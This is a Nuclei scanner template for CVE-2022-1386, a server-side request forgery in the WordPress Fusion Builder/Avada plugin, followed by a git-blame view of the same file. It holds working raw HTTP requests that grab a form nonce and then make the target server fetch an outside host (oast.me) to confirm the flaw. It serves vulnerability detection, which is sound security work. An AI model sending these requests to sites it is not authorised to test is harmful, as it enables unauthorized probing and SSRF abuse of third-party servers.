nuclei-templates/http/cves/2022/CVE-2022-1386.yaml

id: CVE-2022-1386

info:
  name: WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery
  author: akincibor,MantisSTS,calumjelrick
  severity: critical
  description: |
    WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures.
  remediation: |
    Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch.
  reference:
    - https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b
    - https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/
    - https://theme-fusion.com/version-7-6-2-security-update/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1386
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1386
    cwe-id: CWE-918
    epss-score: 0.23237
    epss-percentile: 0.96061
    cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: theme-fusion
    product: avada
    framework: wordpress
  tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{RootURL}}

        action=fusion_form_update_view
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
        Origin: {{BaseURL}}
        Referer: {{RootURL}}

        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="formData"

        email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva
        cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="action"

        fusion_form_submit_form_to_url
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="fusion_form_nonce"

        {{fusionformnonce}}
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="form_id"

        0
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="post_id"

        0
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="field_labels"

        {"email":"Email address"}
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="hidden_field_names"

        []
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="fusionAction"

        https://oast.me
        -----------------------------30259827232283860776499538268
        Content-Disposition: form-data; name="fusionActionMethod"

        GET
        -----------------------------30259827232283860776499538268--

    req-condition: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - Interactsh Server

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        name: fusionformnonce
        internal: true
        xpath:
          - //*[@id="fusion-form-nonce-0"]
        attribute: value
        part: body_1
# digest: 4a0a00473045022100e4b14aaa60e6a26cfcb3eb86ba7e306b4a02cc421a17fc2e2b9980fd570e2e250220106041a6b08c17192806958a043447ec203c0021b02b7f9346b3401eedf375a1:922c64590222798bb761d5b6d8e72950
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`id: CVE-2022-1386`

			`info:`
Enhancement: cves/2022/CVE-2022-1386.yaml by md 2023-04-06 21:41:10 +00:00			`name: WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`author: akincibor,MantisSTS,calumjelrick`
			`severity: critical`
			`description: \|`
Enhancement: cves/2022/CVE-2022-1386.yaml by md 2023-04-06 22:38:20 +00:00			`WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch.`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b`
			`- https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/`
			`- https://theme-fusion.com/version-7-6-2-security-update/`
Enhancement: cves/2022/CVE-2022-1386.yaml by md 2023-04-06 21:41:10 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1386`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-1386`
			`cwe-id: CWE-918`
TemplateMan Update [Fri Nov 10 09:15:00 UTC 2023] :robot: 2023-11-10 09:15:01 +00:00			`epss-score: 0.23237`
TemplateMan Update [Sat Nov 11 17:44:56 UTC 2023] :robot: 2023-11-11 17:44:56 +00:00			`epss-percentile: 0.96061`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:theme-fusion:avada::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: theme-fusion`
			`product: avada`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Origin: {{BaseURL}}`
			`Referer: {{RootURL}}`

			`action=fusion_form_update_view`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268`
			`Origin: {{BaseURL}}`
			`Referer: {{RootURL}}`

			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="formData"`

			`email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva`
			`cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="action"`

			`fusion_form_submit_form_to_url`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="fusion_form_nonce"`

			`{{fusionformnonce}}`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="form_id"`

			`0`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="post_id"`

			`0`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="field_labels"`

			`{"email":"Email address"}`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="hidden_field_names"`

			`[]`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="fusionAction"`

			`https://oast.me`
			`-----------------------------30259827232283860776499538268`
			`Content-Disposition: form-data; name="fusionActionMethod"`

			`GET`
			`-----------------------------30259827232283860776499538268--`

			`req-condition: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- Interactsh Server`
Added CVE-2022-1386 (#4898) 2022-07-23 13:38:58 +00:00
			`- type: status`
			`status:`
			`- 200`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`extractors:`
			`- type: xpath`
			`name: fusionformnonce`
			`internal: true`
			`xpath:`
			`- //*[@id="fusion-form-nonce-0"]`
			`attribute: value`
			`part: body_1`
Auto Template Signing [Sun Nov 12 10:32:58 UTC 2023] :robot: 2023-11-12 10:32:59 +00:00			`# digest: 4a0a00473045022100e4b14aaa60e6a26cfcb3eb86ba7e306b4a02cc421a17fc2e2b9980fd570e2e250220106041a6b08c17192806958a043447ec203c0021b02b7f9346b3401eedf375a1:922c64590222798bb761d5b6d8e72950`